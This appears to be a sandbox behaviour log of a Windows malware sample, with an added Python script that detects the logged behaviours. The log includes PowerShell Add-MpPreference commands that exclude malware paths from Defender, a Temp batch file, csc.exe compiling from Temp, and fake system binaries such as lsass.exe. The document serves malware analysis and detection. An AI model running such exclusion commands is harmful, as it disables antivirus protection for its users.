Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\SystemSettings.exe'
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\JNKHlxGvw4.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8DlY2DY8qp.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown | Process created: C:\Users\user\Desktop\JNKHlxGvw4.exe C:\Users\user\Desktop\JNKHlxGvw4.exe
Source: unknown | Process created: C:\Users\user\Desktop\JNKHlxGvw4.exe C:\Users\user\Desktop\JNKHlxGvw4.exe
Source: unknown | Process created: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe "C:\Program Files\Windows Multimedia Platform\SystemSettings.exe"
Source: unknown | Process created: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe "C:\Program Files\Windows Multimedia Platform\SystemSettings.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe | Process created: C:\Recovery\USZqVcJFLA.exe "C:\Recovery\USZqVcJFLA.exe"
Source: unknown | Process created: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
Source: unknown | Process created: C:\Recovery\USZqVcJFLA.exe "C:\Recovery\USZqVcJFLA.exe"
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline"
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe'
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Favorites\lsass.exe'
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\SystemSettings.exe'
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\JNKHlxGvw4.exe'
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8DlY2DY8qp.bat"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5227.tmp" "c:\Windows\System32\CSC33CD08692B74926AEFF4FCBC6A080B2.TMP"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe | Process created: C:\Recovery\USZqVcJFLA.exe "C:\Recovery\USZqVcJFLA.exe"
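The process-creation listing above contains four behaviours a detection engineer would key on: Defender exclusions added through `Add-MpPreference -ExclusionPath`, a `ping -n 10 localhost` used as a sleep inside a dropped batch file, `csc.exe` compiling a `.cmdline` out of `%TEMP%`, and binaries named `lsass.exe`, `RuntimeBroker.exe` and `SystemSettings.exe` running from directories where Windows does not install them. The script below is an added example, not part of the Joe Sandbox report: it parses a handful of the events transcribed from the listing (constructed sample, accepting both the `Source: X | Process created: Y` form and the fused form from the raw extraction), and emits findings for each behaviour. The rule names and the table of expected install directories are this example's own assumptions.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample: a subset of the "Process created" events transcribed from the
# listing above, one event per line.
SAMPLE_EVENTS = r"""
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe'
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Favorites\lsass.exe'
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8DlY2DY8qp.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown | Process created: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe "C:\Program Files\Windows Multimedia Platform\SystemSettings.exe"
Source: unknown | Process created: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Recovery\USZqVcJFLA.exe "C:\Recovery\USZqVcJFLA.exe"
"""

# Listing parser; the separator is optional so the fused "...exeProcess created:" form parses too.
EVENT_RE = re.compile(r"^Source:\s*(?P<parent>.*?)\s*\|?\s*Process created:\s*(?P<cmd>.*)$")
# The created image is everything up to the first ".exe"/".com" followed by whitespace or end of line.
IMAGE_RE = re.compile(r"^(?P<image>.+?\.(?:exe|com))(?:\s|$)", re.IGNORECASE)

# Detection patterns (rule names are this example's own, not sandbox signature names).
EXCLUSION_RE = re.compile(r"Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)\s+'([^']+)'", re.IGNORECASE)
PING_SLEEP_RE = re.compile(r"\bping(?:\.exe)?\s+-n\s+(\d+)\s+(?:localhost|127\.0\.0\.1)\b", re.IGNORECASE)
TEMP_SCRIPT_RE = re.compile(r"\\AppData\\Local\\Temp\\[^\s\"']+\.(?:bat|cmd|cmdline)\b", re.IGNORECASE)

# Directories where Windows actually installs these binaries (assumed baseline, lower-cased).
EXPECTED_DIRS = {
    "lsass.exe": {r"c:\windows\system32"},
    "runtimebroker.exe": {r"c:\windows\system32"},
    "systemsettings.exe": {r"c:\windows\immersivecontrolpanel"},
}


def parse_events(text):
    """Turn listing lines into dicts with parent image, created image and full command line."""
    events = []
    for line in text.strip().splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        cmd = m.group("cmd").strip()
        im = IMAGE_RE.match(cmd)
        image = im.group("image") if im else cmd.split()[0]
        events.append({"parent": m.group("parent"), "image": image, "cmdline": cmd})
    return events


def is_masquerading(path):
    """True when the file name is a well-known Windows binary but the directory is not where Windows ships it."""
    p = PureWindowsPath(path)
    expected = EXPECTED_DIRS.get(p.name.lower())
    return bool(expected) and str(p.parent).lower() not in expected


def analyze(events):
    """Return (rule, detail) findings for the behaviours seen in the listing."""
    findings = []
    for ev in events:
        cmd, image = ev["cmdline"], ev["image"]
        for excluded in EXCLUSION_RE.findall(cmd):
            findings.append(("defender_exclusion", excluded))
            if is_masquerading(excluded):  # exclusion granted to a fake system binary
                findings.append(("system_name_masquerade", excluded))
        m = PING_SLEEP_RE.search(cmd)
        if m:  # ping waits about one second between echoes, so -n N is roughly an N-1 second sleep
            findings.append(("ping_sleep", f"~{int(m.group(1)) - 1}s delay"))
        m = TEMP_SCRIPT_RE.search(cmd)
        if m:
            rule = "compile_from_temp" if PureWindowsPath(image).name.lower() == "csc.exe" else "temp_script"
            findings.append((rule, m.group(0)))
        if is_masquerading(image):
            findings.append(("system_name_masquerade", image))
    return findings


if __name__ == "__main__":
    for rule, detail in analyze(parse_events(SAMPLE_EVENTS)):
        print(f"{rule:24} {detail}")
```

On a live host the same logic applies to Sysmon event 1 or Windows 4688 command lines; the exclusion paths found here are also exactly the entries to look for in `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` when confirming the host was tampered with.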
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: ktmw32.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: version.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: wldp.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: amsi.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: userenv.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: profapi.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: version.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: wldp.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: amsi.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: userenv.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: profapi.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Favorites\lsass.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: amsi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: userenv.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: amsi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: userenv.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Section loaded: sspicli.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: mscoree.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: apphelp.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: kernel.appcore.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: version.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: uxtheme.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: wldp.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: amsi.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: userenv.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: profapi.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: windows.storage.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: cryptsp.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: rsaenh.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: cryptbase.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: sspicli.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: mscoree.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: kernel.appcore.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: version.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: uxtheme.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: wldp.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: amsi.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: userenv.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: profapi.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: windows.storage.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: cryptsp.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: rsaenh.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: cryptbase.dll
Source: C:\Recovery\USZqVcJFLA.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
